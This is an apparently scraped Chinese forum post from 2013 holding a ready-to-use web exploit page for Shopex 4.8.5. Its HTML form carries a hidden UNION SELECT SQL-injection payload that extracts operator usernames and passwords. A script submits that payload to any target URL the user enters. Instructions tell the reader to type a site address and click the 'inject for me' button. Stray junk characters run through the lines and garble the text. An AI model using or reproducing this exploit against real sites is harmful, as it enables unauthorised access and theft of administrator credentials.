<center>' f$ m- O5 q a( ~, ]- v3 Q
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>: \& _& v+ p5 \# a2 i
<form action="" method="post" name="submit_url">
* a+ L8 I c; ~# [* F a网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>' m3 E. C6 n: @
<input type="hidden" name="goods[goods_id]" value="3">& L4 q: x- O& y% E- o/ @
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">" v+ Q) w* K. x- r9 ^" _
<input type="submit" value="给我注入" onclick=fsubmit()>
+ o% E$ s) y. A1 O( M! F</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
0 p& _* P8 V2 }* X( y) k6 X0 ^1 m, u i2 {0 x o7 r3 P
<script> 8 J+ w# D) N) m7 |6 x
function fsubmit(){ 1 ?3 y5 j: `5 L. y, Q
form = document.forms[0];
) z5 C1 T1 F, X- w) U2 ]form.action = form.url.value+'/?product-gnotify';
* q$ h. ]! w7 C8 ]0 V4 }form.submit(); 9 h+ e3 @" n9 N+ B. b/ w
}
8 g- b) g7 F* e9 B9 k* R) R3 P</script>1 r7 m' i" L0 `8 ]2 G, T
|
发表于 2013-1-23 09:20:52
收藏
分享
支持
反对